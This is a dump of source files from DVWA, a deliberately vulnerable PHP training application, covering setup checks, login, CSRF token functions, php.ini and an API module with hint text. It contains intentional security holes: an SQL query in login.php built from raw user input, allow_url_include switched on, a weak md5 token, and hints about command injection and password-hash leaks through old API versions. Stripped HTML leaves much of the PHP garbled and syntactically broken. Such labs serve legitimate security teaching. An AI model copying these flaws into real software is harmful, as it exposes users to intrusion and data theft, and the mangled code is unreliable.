\\n\";\n\t}\n\treturn $guestbook;\n}\n// -- END (XSS Stored guestbook)\n\n\n// Token functions --\nfunction checkToken( $user_token, $session_token, $returnURL ) { # Validate the given (CSRF) token\n\tglobal $_DVWA;\n\n\tif (array_key_exists(\"disable_authentication\", $_DVWA) && $_DVWA['disable_authentication']) {\n\t\treturn true;\n\t}\n\n\tif( $user_token !== $session_token || !isset( $session_token ) ) {\n\t\tdvwaMessagePush( 'CSRF token is incorrect' );\n\t\tdvwaRedirect( $returnURL );\n\t}\n}\n\nfunction generateSessionToken() { # Generate a brand new (CSRF) token\n\tif( isset( $_SESSION[ 'session_token' ] ) ) {\n\t\tdestroySessionToken();\n\t}\n\t$_SESSION[ 'session_token' ] = md5( uniqid() );\n}\n\nfunction destroySessionToken() { # Destroy any session with the name 'session_token'\n\tunset( $_SESSION[ 'session_token' ] );\n}\n\nfunction tokenField() { # Return a field for the (CSRF) token\n\treturn \"\";\n}\n// -- END (Token functions)\n\n\n// Setup Functions --\n$PHPUploadPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . \"hackable\" . DIRECTORY_SEPARATOR . \"uploads\" ) . DIRECTORY_SEPARATOR;\n$PHPCONFIGPath = realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . \"config\");\n\n\n$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure\">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)\n$phpDisplayStartupErrors = 'PHP function display_startup_errors: Enabled' : 'failure\">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)\n$phpDisplayErrors = 'PHP function display_errors: Enabled' : 'failure\">Disabled' ) . ''; // Verbose error messages (e.g. full path disclosure)\n$phpURLInclude = 'PHP function allow_url_include: Enabled' : 'failure\">Disabled' ) . ' - Feature deprecated in PHP 7.4, see lab for more information'; // RFI\n$phpURLFopen = 'PHP function allow_url_fopen: Enabled' : 'failure\">Disabled' ) . ''; // RFI\n$phpGD = 'PHP module gd: Installed' : 'failure\">Missing - Only an issue if you want to play with captchas' ) . ''; // File Upload\n$phpMySQL = 'PHP module mysql: Installed' : 'failure\">Missing' ) . ''; // Core DVWA\n$phpPDO = 'PHP module pdo_mysql: Installed' : 'failure\">Missing' ) . ''; // SQLi\n$DVWARecaptcha = 'reCAPTCHA key: ' . $_DVWA[ 'recaptcha_public_key' ] : 'failure\">Missing' ) . '';\n\n$DVWAUploadsWrite = 'Writable folder ' . $PHPUploadPath . ': Yes' : 'failure\">No' ) . ''; // File Upload\n$bakWritable = 'Writable folder ' . $PHPCONFIGPath . ': Yes' : 'failure\">No' ) . ''; // config.php.bak check // File Upload\n\n$DVWAOS = 'Operating system: ' . ( strtoupper( substr (PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : '*nix' ) . '';\n$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF\n\n$MYSQL_USER = 'Database username: ' . $_DVWA[ 'db_user' ] . '';\n$MYSQL_PASS = 'Database password: ' . ( ($_DVWA[ 'db_password' ] != \"\" ) ? '******' : '*blank*' ) . '';\n$MYSQL_DB = 'Database database: ' . $_DVWA[ 'db_database' ] . '';\n$MYSQL_SERVER = 'Database host: ' . $_DVWA[ 'db_server' ] . '';\n$MYSQL_PORT = 'Database port: ' . $_DVWA[ 'db_port' ] . '';\n// -- END (Setup Functions)\n\n?>\n"
},
{
"path": "dvwa/js/add_event_listeners.js",
"content": "// These functions need to be called after the content they reference\n// has been added to the page otherwise they will fail.\n\nfunction addEventListeners() {\n\tvar source_button = document.getElementById (\"source_button\");\n\n\tif (source_button) {\n\t\tsource_button.addEventListener(\"click\", function() {\n\t\t\tvar url=source_button.dataset.sourceUrl;\n\t\t\tpopUp (url);\n\t\t});\n\t}\n\n\tvar help_button = document.getElementById (\"help_button\");\n\n\tif (help_button) {\n\t\thelp_button.addEventListener(\"click\", function() {\n\t\t\tvar url=help_button.dataset.helpUrl;\n\t\t\tpopUp (url);\n\t\t});\n\t}\n}\n\naddEventListeners();\n"
},
{
"path": "dvwa/js/dvwaPage.js",
"content": "/* Help popup */\r\n\r\nfunction popUp(URL) {\r\n\tday = new Date();\r\n\tid = day.getTime();\r\n\twindow.open(URL, '\" + id + \"', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250');\r\n\t//eval(\"page\" + id + \" = window.open(URL, '\" + id + \"', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=800,height=300,left=540,top=250');\");\r\n}\r\n\r\n/* Form validation */\r\n\r\nfunction validate_required(field,alerttxt)\r\n{\r\nwith (field) {\r\n if (value==null||value==\"\") {\r\n alert(alerttxt);return false;\r\n }\r\n else {\r\n return true;\r\n }\r\n }\r\n}\r\n\r\nfunction validateGuestbookForm(thisform) {\r\nwith (thisform) {\r\n\r\n // Guestbook form\r\n if (validate_required(txtName,\"Name can not be empty.\")==false)\r\n {txtName.focus();return false;}\r\n \r\n if (validate_required(mtxMessage,\"Message can not be empty.\")==false)\r\n {mtxMessage.focus();return false;}\r\n \r\n }\r\n}\r\n\r\nfunction confirmClearGuestbook() {\r\n\treturn confirm(\"Are you sure you want to clear the guestbook?\");\r\n}\r\n\r\nfunction toggleTheme() {\r\n document.body.classList.toggle('dark');\r\n const theme = document.body.classList.contains('dark') ? 'dark' : 'light';\r\n document.cookie = \"theme=\" + theme + \"; path=/\";\r\n}\r\n"
},
{
"path": "external/recaptcha/recaptchalib.php",
"content": " $key,\n\t\t\t'response' => urlencode($response),\n\t\t\t'remoteip' => urlencode($_SERVER['REMOTE_ADDR'])\n\t\t);\n\n\t\t$opt = array(\n\t\t\t'http' => array(\n\t\t\t\t'header' => \"Content-type: application/x-www-form-urlencoded\\r\\n\",\n\t\t\t\t'method' => 'POST',\n\t\t\t\t'content' => http_build_query($dat)\n\t\t\t)\n\t\t);\n\n\t\t$context = stream_context_create($opt);\n\t\t$result = file_get_contents($url, false, $context);\n\n\t\treturn json_decode($result)->success;\n\n\t} catch (Exception $e) {\n\t\treturn null;\n\t}\n\n}\n\nfunction recaptcha_get_html($pubKey){\n\treturn \"\n\t\t\n\t\t\" . \"Message: {$comment}
\n\t\";\n}\n\n?>\n" }, { "path": "hackable/flags/fi.php", "content": "\n\n1.) Bond. James Bond\n\n
\\n\";\n\n$line3 = \"3.) Romeo, Romeo! Wherefore art thou Romeo?\";\n$line3 = \"--LINE HIDDEN ;)--\";\necho $line3 . \"\\n\\n
\\n\";\n\n$line4 = \"NC4pI\" . \"FRoZSBwb29s\" . \"IG9uIH\" . \"RoZSByb29mIG1\" . \"1c3QgaGF\" . \"2ZSBh\" . \"IGxlY\" . \"Wsu\";\necho base64_decode( $line4 );\n\n?>\n\n\n" }, { "path": "index.php", "content": "\n\t
Welcome to Damn Vulnerable Web Application!
\n\tDamn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.
\n\tThe aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficultly, with a simple straightforward interface.
\n\t\n\t
\n\n\t
General Instructions
\n\tIt is up to the user how they approach DVWA. Either by working through every module at a fixed level, or selecting any module and working up to reach the highest level they can before moving onto the next one. There is not a fixed object to complete a module; however users should feel that they have successfully exploited the system as best as they possible could by using that particular vulnerability.
\n\tPlease note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.
\n\tThere is a help button at the bottom of each page, which allows you to view hints & tips for that vulnerability. There are also additional links for further background reading, which relates to that security issue.
\n\t\n\t
\n\n\t
WARNING!
\n\tDamn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as \" . dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' ) . \" or \" . dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' ) . \"), which is set to NAT networking mode. Inside a guest machine, you can download and install \" . dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/','XAMPP' ) . \" for the web server and database.
\n\t\n\t
Disclaimer
\n\tWe do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.
\n\t\n\t
\n\n\t
More Training Resources
\n\tDVWA aims to cover the most commonly seen vulnerabilities found in today's web applications. However there are plenty of other issues with web applications. Should you wish to explore any additional attack vectors, or want more difficult challenges, you may wish to look into the following other projects:
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://github.com/webpwnized/mutillidae', 'Mutillidae') . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-vulnerable-web-applications-directory', 'OWASP Vulnerable Web Applications Directory') . \" \n\t
\n\t
\n\";\n\ndvwaHtmlEcho( $page );\n\n?>\n" }, { "path": "instructions.php", "content": " array( 'type' => 'markdown', 'legend' => 'Read Me', 'file' => 'README.md' ),\r\n\t'PDF' => array( 'type' => 'html' ,'legend' => 'PDF Guide', 'file' => 'docs/pdf.html' ),\r\n\t'changelog' => array( 'type' => 'markdown', 'legend' => 'Change Log', 'file' => 'CHANGELOG.md' ),\r\n\t'copying' => array( 'type' => 'markdown', 'legend' => 'Copying', 'file' => 'COPYING.txt' ),\r\n);\r\n\r\n$selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : '';\r\nif( !array_key_exists( $selectedDocId, $docs ) ) {\r\n\t$selectedDocId = 'readme';\r\n}\r\n$readFile = $docs[ $selectedDocId ][ 'file' ];\r\n\r\n$instructions = file_get_contents( DVWA_WEB_PAGE_TO_ROOT.$readFile );\r\n\r\nif ($docs[ $selectedDocId ]['type'] == \"markdown\") {\r\n\t$parsedown = new ParseDown();\r\n\t$instructions = $parsedown->text($instructions);\r\n}\r\n\r\n/*\r\nfunction urlReplace( $matches ) {\r\n\treturn dvwaExternalLinkUrlGet( $matches[1] );\r\n}\r\n\r\n// Make links and obfuscate the referer...\r\n$instructions = preg_replace_callback(\r\n\t'/((http|https|ftp):\\/\\/([[:alnum:]|.|\\/|?|=]+))/',\r\n\t'urlReplace',\r\n\t$instructions\r\n);\r\n\r\n$instructions = nl2br( $instructions );\r\n*/\r\n$docMenuHtml = '';\r\nforeach( array_keys( $docs ) as $docId ) {\r\n\t$selectedClass = ( $docId == $selectedDocId ) ? ' selected' : '';\r\n\t$docMenuHtml .= \"\";\r\n}\r\n$docMenuHtml = \"\";\r\n\r\n$page[ 'body' ] .= \"\r\n
\r\n\t
\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "login.php",
"content": "Need to run 'setup.php'.\" );\r\n\t\tdvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' );\r\n\t}\r\n\r\n\t$query = \"SELECT * FROM `users` WHERE user='$user' AND password='$pass';\";\r\n\t$result = @mysqli_query($GLOBALS[\"___mysqli_ston\"], $query ) or die( 'Instructions
\r\n\r\n\t{$docMenuHtml}\r\n\r\n\t\r\n\t\t{$instructions}\r\n\t\r\n' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '.' );\r\n\tif( $result && mysqli_num_rows( $result ) == 1 ) { // Login Successful...\r\n\t\tdvwaMessagePush( \"You have logged in as '{$user}'\" );\r\n\t\tdvwaLogin( $user );\r\n\t\tdvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'index.php' );\r\n\t}\r\n\r\n\t// Login failed\r\n\tdvwaMessagePush( 'Login failed' );\r\n\tdvwaRedirect( 'login.php' );\r\n}\r\n\r\n$messagesHtml = messagesPopAllToHtml();\r\n\r\nHeader( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1\r\nHeader( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers...\r\nHeader( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past\r\n\r\n// Anti-CSRF\r\ngenerateSessionToken();\r\n\r\necho \"\r\n\r\n\r\n\r\n\t\r\n\r\n\t\t\r\n\r\n\t\t
Try installing again.
\r\n\r\n\t
\r\n\r\n\t\r\n\r\n\";\r\n\r\n?>\r\n"
},
{
"path": "logout.php",
"content": "\r\n"
},
{
"path": "php.ini",
"content": "; This file attempts to overwrite the original php.ini file. Doesnt always work.\r\n\r\nmagic_quotes_gpc = Off\r\nallow_url_fopen = on\r\nallow_url_include = on\r\n"
},
{
"path": "phpinfo.php",
"content": "\r\n"
},
{
"path": "robots.txt",
"content": "User-agent: *\nDisallow: /"
},
{
"path": "security.php",
"content": "Security level is currently: $securityLevel.\r\n\r\n\t
\r\n\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\r\n\t
\r\n\r\n\t{$messagesHtml}\r\n\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\r\n\t
\r\n\r\n\t \r\n\r\n\t\r\n\r\n\t{$messagesHtml}\r\n\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\t
\r\n\r\n\t
\";\n\t}\n\t$securityOptionsHtml .= \"\";\n}\n\n// Anti-CSRF\ngenerateSessionToken();\n\n$page[ 'body' ] .= \"\n
\n\tDVWA Security
\n\t
\n\n\t
\n\t
\n\t
\";\n\ndvwaHtmlEcho( $page );\n\n?>\n"
},
{
"path": "security.txt",
"content": "The clue is in its name, DVWA contains both intentional and unintentional vulnerabliities, that is it's whole point, please do not try to report them.\n"
},
{
"path": "setup.php",
"content": "UnknownDVWA Security
\n\t\n\n\t
Security Level
\n\n\t{$securityHtml}\n\n\t\n\t\n\t\n\t
\n\t
Additional Tools
\n\t- \n\t\t
- View Broken Access Control Logs - View access logs for the Broken Access Control vulnerability \n\t
\";\r\n$mod_rewrite = \"Unknown
\";\r\n\r\nif (PHP_OS == \"Linux\") {\r\n\tif (is_dir (\".git\")) {\r\n\t\t$git_log = shell_exec (\"git -c 'safe.directory=*' log -1\");\r\n\t\tif (!is_null ($git_log)) {\r\n\t\t\t$tmp = explode (\"\\n\", $git_log);\r\n\t\t\t$date = str_replace (\"Date: \", \"Date: \", $tmp[2]);\r\n\t\t\t$git_ref = \"
- \" . str_replace (\"commit \", \"Git reference: \", $tmp[0]) . \"
- \" . $date . \"
\";\r\n\t} else {\r\n\t\t$mod_rewrite = \"Enabled
\";\r\n\t}\r\n}\r\n\r\nif (!is_dir (\"./vulnerabilities/api/vendor\")) {\r\n\t$vendor = \"Not Installed
\";\r\n\t$vendor .= \"For information on how to install these, see the README.
\";\r\n} else {\r\n\t$vendor = \"Installed
\";\r\n}\r\n\r\n$phpVersionWarning = \"\";\r\n\r\nif (version_compare(phpversion(), '6', '<')) {\r\n\t$phpVersionWarning = \"Versions of PHP below 7.x are not supported, please upgrade.
\";\r\n} elseif (version_compare(phpversion(), '7.3', '<')) {\r\n\t$phpVersionWarning = \"Versions of PHP below 7.3 may work but have known problems, please upgrade.
\";\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n
\r\n\tDatabase Setup
\r\n\r\n\t
\r\n\t
\r\n\r\n\t
\r\n\t{$DVWAOS}
\r\n\t
\r\n\tDVWA version: {$git_ref}\r\n\t
\r\n\t{$DVWARecaptcha}
\r\n\t
\r\n\t{$DVWAUploadsWrite}
\r\n\t{$bakWritable}\r\n\t
\r\n\t
\r\n\r\n\tApache
\r\n\t{$SERVER_NAME}
\r\n\tmod_rewrite: {$mod_rewrite}\r\n\tmod_rewrite is required for the API labs.
\r\n\r\n\tPHP
\r\n\tPHP version: \" . phpversion() . \"
\r\n\t{$phpVersionWarning}\r\n\t{$phpDisplayErrors}
\r\n\t{$phpDisplayStartupErrors}
\r\n\t{$phpURLInclude}
\r\n\t{$phpURLFopen}
\r\n\t{$phpGD}
\r\n\t{$phpMySQL}
\r\n\t{$phpPDO}
\r\n\t
\r\n\tDatabase
\r\n\tBackend database: {$database_type_name}
\r\n\t{$MYSQL_USER}
\r\n\t{$MYSQL_PASS}
\r\n\t{$MYSQL_DB}
\r\n\t{$MYSQL_SERVER}
\r\n\t{$MYSQL_PORT}
\r\n\t
\r\n\tAPI
\r\n\tThis section is only important if you want to use the API module.
\r\n\tVendor files installed: {$vendor}
\r\n\r\n\tStatus in red, indicate there will be an issue when trying to complete some modules.
\r\n\t
\r\n\tIf you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini file and restart Apache.
\r\n\t
\r\n\r\n\t\r\n\t\r\n\t
\r\n\t
\r\n
\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "tests/README.md",
"content": "# Tests\n\n## Usage\n\nTo run these scripts manually, run the following from the document root:\n\n```\npython3 -m pytest -s\n```\n\n## test_url.py\n\nThis test will find all fully qualified URLs mentioned in any PHP script and will check if the URL is still alive. This helps weed out dead links from documentation and references.\n\n"
},
{
"path": "tests/test_url.py",
"content": "import glob\nimport re\nimport requests\nimport time\n\n\ndef get_php_files():\n patterns = [\"*.php\", \"*/*.php\", \"*/*/*.php\"]\n files = []\n ignore_files = [\"dvwa/includes/Parsedown.php\"]\n for pattern in patterns:\n files.extend(glob.glob(pattern))\n for ignore_file in ignore_files:\n if ignore_file in files:\n files.remove(ignore_file)\n return files\n\n\ndef get_urls(filename):\n with open(filename, 'r') as f:\n content = f.read()\n matches = re.findall(\"[\\'\\\"](https?://.*?)[\\'\\\"]\", content)\n return matches\n\n\ndef check_once(url):\n try:\n headers = {\n 'User-Agent':\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit'\n '/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'\n }\n response = requests.get(url, headers=headers, timeout=5)\n except requests.exceptions.ConnectionError:\n return False, -1\n return response.ok, response.status_code\n\n\ndef check(url):\n # We try for 5 times, with 3 seconds interval.\n try_count = 1\n try_interval = 3\n for i in range(try_count):\n ok, status_code = check_once(url)\n if ok:\n break\n time.sleep(try_interval)\n return ok, status_code\n\n\ndef test_url():\n # Need to rewrite this so it generates a single, unique list of URLs,\n # removes any which are to be ignored, and then checks them. Would be\n # much cleaner.\n\n ignore_urls = [\n \"https://wpscan.com/\",\n # Cloudflare doesn't like GitHub checking it\n\n \"http://www.w3.org/TR/html4/loose.dtd\",\n # Don't need to check the DTD\n\n # \"https://twitter.com/digininja\",\n # Twitter doesn't like GitHub checking it\n\n \"https://www.cgisecurity.com/xss-faq.html\",\n # Timeout\n\n \"https://www.cgisecurity.com/csrf-faq.html\"\n # Timeout\n ]\n\n expected_codes = {\n \"https://www.vmware.com/\": 403,\n \"https://www.virtualbox.org/\": 402,\n\n \"https://github.com/digininja/DVWA/blob/master/README.md\"\n \"#vendor-files\": 429,\n\n \"https://github.com/digininja/DVWA/blob/master/README.md\"\n \"#apache-modules\": 429,\n\n \"https://hacks.mozilla.org/2020/08/\"\n \"changes-to-samesite-cookie-behavior/\": 403,\n\n \"https://blog.mozilla.org/security/2014/10/04/\"\n \"csp-for-the-web-we-have/\": 403,\n\n \"https://medium.com/@masjadaan/\"\n \"oracle-padding-attack-a61369993c86\": 403,\n\n \"https://www.golinuxcloud.com/brute-force-attack-web-forms\": 403,\n }\n\n all_urls = []\n broken_urls = []\n for php_file in get_php_files():\n for url in get_urls(php_file):\n all_urls.append(url)\n\n # This removes any duplicates\n dedup_urls = list(dict.fromkeys(all_urls))\n\n for url in dedup_urls:\n if url not in ignore_urls:\n # print(\"checking %s\" % url)\n ok, status_code = check(url)\n if not ok and status_code != expected_codes.get(url):\n # The php_file variable is now broken\n # as it was set in a previous loop\n # and doesn't come across into this one.\n\n # print(\"failed to access %s from file %s with code\n # %d\" % (url, php_file, status_code))\n # broken_urls.append((php_file, url, status_code))\n broken_urls.append((url, status_code))\n\n # for php_file, url, status_code in broken_urls:\n # print(\"%s\\t%s\\t%d\" % (php_file, url, status_code))\n\n for url, status_code in broken_urls:\n print(\"%s\\t%d\" % (url, status_code))\n\n assert len(broken_urls) == 0, \"Broken URLs Detected.\"\n"
},
{
"path": "vulnerabilities/api/.htaccess",
"content": "Database Setup
\r\n\r\n\tClick on the 'Create / Reset Database' button below to create or reset your database.
\r\n\tIf you get an error make sure you have the correct user credentials in: \" . realpath( getcwd() . DIRECTORY_SEPARATOR . \"config\" . DIRECTORY_SEPARATOR . \"config.inc.php\" ) . \"
If the database already exists, it will be cleared and the data will be reset.
\r\n\tYou can also use this to reset the administrator credentials (\\\"admin // password\\\") at any stage.
\r\n\t
\r\n\r\n\t
Setup Check
\r\n\r\n\tGeneral\r\n\t{$DVWAOS}
\r\n\t
\r\n\tDVWA version: {$git_ref}\r\n\t
\r\n\t{$DVWARecaptcha}
\r\n\t
\r\n\t{$DVWAUploadsWrite}
\r\n\t{$bakWritable}\r\n\t
\r\n\t
\r\n\r\n\tApache
\r\n\t{$SERVER_NAME}
\r\n\tmod_rewrite: {$mod_rewrite}\r\n\tmod_rewrite is required for the API labs.
\r\n\r\n\tPHP
\r\n\tPHP version: \" . phpversion() . \"
\r\n\t{$phpVersionWarning}\r\n\t{$phpDisplayErrors}
\r\n\t{$phpDisplayStartupErrors}
\r\n\t{$phpURLInclude}
\r\n\t{$phpURLFopen}
\r\n\t{$phpGD}
\r\n\t{$phpMySQL}
\r\n\t{$phpPDO}
\r\n\t
\r\n\tDatabase
\r\n\tBackend database: {$database_type_name}
\r\n\t{$MYSQL_USER}
\r\n\t{$MYSQL_PASS}
\r\n\t{$MYSQL_DB}
\r\n\t{$MYSQL_SERVER}
\r\n\t{$MYSQL_PORT}
\r\n\t
\r\n\tAPI
\r\n\tThis section is only important if you want to use the API module.
\r\n\tVendor files installed: {$vendor}
\r\n\r\n\tStatus in red, indicate there will be an issue when trying to complete some modules.
\r\n\t
\r\n\tIf you see disabled on either allow_url_fopen or allow_url_include, set the following in your php.ini file and restart Apache.
\r\n\t
allow_url_fopen = On\r\nallow_url_include = On\r\n\r\n\t\r\n\t\r\n\t
\r\n\t
\r\n
\n\t
\n"
},
{
"path": "vulnerabilities/api/index.php",
"content": "Warning, mod_rewrite is not enabledHelp - API Security
\n\n\t\n\t\n\t
\n\n\t
\n\t\n\n\t\t About\n\t\t\n\t\tMost modern web apps use some kind of API, either as Single Page Apps (SPAs) or to retrieve data to populate traditional apps. As these APIs are behind the scenes, developers sometimes feel they can cut corners in areas such as authentication, authorisation or data validation. As testers, we can get behind the curtains and directly access these seemingly hidden calls to take advantage of these weaknesses.\n\t\t \n\t\t\n\t\tThis module will look at three weaknesses, versioning, mass assignment, and ..... \n\t\t \n\n\t\t\n\n\t\t Objective\n\t\tEach level has its own objective but the general idea is to exploit weak API implementations. \n\n\t\t\n\n\t\t Low Level\n\t\tThe call being made by the JavaScript is for version 2 of the endpoint, could there be other, earlier, versions available? \n\t\t\n\t\t\n\t\t \n\t\t\n\t\t \n\n\t\tEither by looking at the JavaScript or watching network traffic, you should notice that there is a call being made to \n\t\t\tAs the call is being made against version two ( \n\t\t\tWhatever approach you try, by accessing version one of the endpoint, you should be able to see the password hashes as part of the data.\n\t\t \n\t\tMedium Level\n\t\t\n\t\t\tLook at the call made by the site, but also look at the swagger docs and see if there are any other parameters you might be able to add that are not currently passed.\n\t\t \n\t\t\n\t\t\n\t\t \n\t\t\n\t\t \n\n\t\tWhen you update your name, a PUT request is made to \n\t\t\tIf you look at the swagger docs, the definition for \n\t\t\tWhich is what you are currently passing, but if you have a look at \n\t\t\tNotice the extra \n\t\t\tIn situations like this, it is always worth testing to see if extra parameters which exist on similar calls will also work on the one you are working on.\n\t\t \n\n\t\t\n\t\t\tTo try this, you can either intercept the request in a proxy, or you can modify the JSON before the request is sent to the server. To modify it in the page, you can set a breakpoint in the \n\t\t\tIf you do this and then check the JSON sent in the PUT request, you should see:\n\t\t \n\n\n\t\t\tAnd hopefully a congratulations message.\n\t\t \n\t\tHigh Level\n\t\tImport the four health calls into your testing tool of choice and make sure they are running properly. When they are all working, test them for vulnerabilities. \n\n\t\t\n\t\t\n\t\t \n\n\t\t\n\t\t \n\n\t\tThe connectivity call takes a target parameter and pings it to check for a connection, this is done by calling the OS ping command and is vulnerable to command injection. \n\t\t\n\t\tFor more information on how to exploit this type of issue, see the command injection module.\n\t\t \n\t\tImpossible Level\n\t\t\n\t\t\tThe challenge here is just to get the login process automated in Postman or your tool of choice. Read the documentation and experiment. To help get things working I piped everything through Burp and watched each call as it was made to see if it matched what I expected.\n\t\t \n\t\t\n\t\t\tWhen the flow works correctly, the initial login will return an access token and a refresh token along with an \n\t\t\tIt should be noted that as well as the access token having a fixed lifespan, the refresh token also has a fixed lifespan, once it has expired, the login process has to begin again from scratch.\n\t\t \n\t | \n\t
\";\n\t\t$html .= \"See the README for more information.
\";\n\t}\n}\n\nif (!is_dir (\"./vendor\")) {\n\t$html .= \"Warning, composer has not been run.
\";\n\t$html .= \"See the README for more information.
\";\n}\n\t\n\nrequire_once DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/api/source/{$vulnerabilityFile}\";\n\n$page[ 'body' ] .= \"
\n\t
\\n\";\n\ndvwaHtmlEcho( $page );\n\n?>\n\n"
},
{
"path": "vulnerabilities/api/openapi.yml",
"content": "openapi: 3.0.0\ninfo:\n title: 'DVWA API'\n contact:\n url: 'https://github.com/digininja/DVWA/'\n email: robin@digi.ninja\n version: '0.1'\nservers:\n -\n url: 'http://dvwa.test'\n description: 'API server'\npaths:\n /vulnerabilities/api/v2/health/echo:\n post:\n tags:\n - health\n description: 'Echo, echo, cho, cho, o o ....'\n operationId: echo\n requestBody:\n description: 'Your words.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Words'\n responses:\n '200':\n description: 'Successful operation.'\n /vulnerabilities/api/v2/health/connectivity:\n post:\n tags:\n - health\n description: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.'\n operationId: checkConnectivity\n requestBody:\n description: 'Remote host.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Target'\n responses:\n '200':\n description: 'Successful operation.'\n /vulnerabilities/api/v2/health/status:\n get:\n tags:\n - health\n description: 'Get the health of the system.'\n operationId: getHealthStatus\n responses:\n '200':\n description: 'Successful operation.'\n /vulnerabilities/api/v2/health/ping:\n get:\n tags:\n - health\n description: 'Simple ping/pong to check connectivity.'\n operationId: ping\n responses:\n '200':\n description: 'Successful operation.'\n /vulnerabilities/api/v2/login/login:\n post:\n tags:\n - login\n description: 'Login as user.'\n operationId: login\n requestBody:\n description: 'The login credentials.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Credentials'\n responses:\n '200':\n description: 'Successful operation.'\n '401':\n description: 'Invalid credentials.'\n /vulnerabilities/api/v2/login/check_token:\n post:\n tags:\n - login\n description: 'Check a token is valid.'\n operationId: check_token\n requestBody:\n description: 'The token to test.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Token'\n responses:\n '200':\n description: 'Successful operation.'\n '401':\n description: 'Token is invalid.'\n '/vulnerabilities/api/v2/order/{id}':\n get:\n tags:\n - order\n description: 'Get a order by ID.'\n operationId: getOrderByID\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Order'\n '404':\n description: 'Order not found.'\n security:\n -\n scalar: basicAuth\n put:\n tags:\n - order\n description: 'Update an order by ID.'\n operationId: updateOrder\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n requestBody:\n description: 'New order data.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/OrderUpdate'\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Order'\n '404':\n description: 'Order not found'\n '422':\n description: 'Invalid order object provided'\n delete:\n tags:\n - order\n description: 'Delete order by ID.'\n operationId: deleteOrderById\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n responses:\n '200':\n description: 'Successful operation.'\n '404':\n description: 'Order not found'\n /vulnerabilities/api/v2/order/:\n get:\n tags:\n - order\n description: 'Get all orders.'\n operationId: getOrders\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n type: array\n items:\n $ref: '#/components/schemas/Order'\n post:\n tags:\n - order\n description: 'Create a new order.'\n operationId: addOrder\n requestBody:\n description: 'Order data.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/OrderAdd'\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/Order'\n '422':\n description: 'Invalid order object provided'\n '/vulnerabilities/api/v2/user/{id}':\n get:\n tags:\n - user\n description: 'Get a user by ID.'\n operationId: getUserByID\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n responses:\n '200':\n description: 'Successful operation.'\n content:\n application/json:\n schema:\n $ref: '#/components/schemas/User'\n '404':\n description: 'User not found.'\n put:\n tags:\n - user\n description: 'Update a user by ID.'\n operationId: updateUser\n parameters:\n -\n name: id\n in: path\n required: true\n schema:\n type: integer\n requestBody:\n description: 'New user data.'\n content:\n application/json:\n schema:\n $ref: 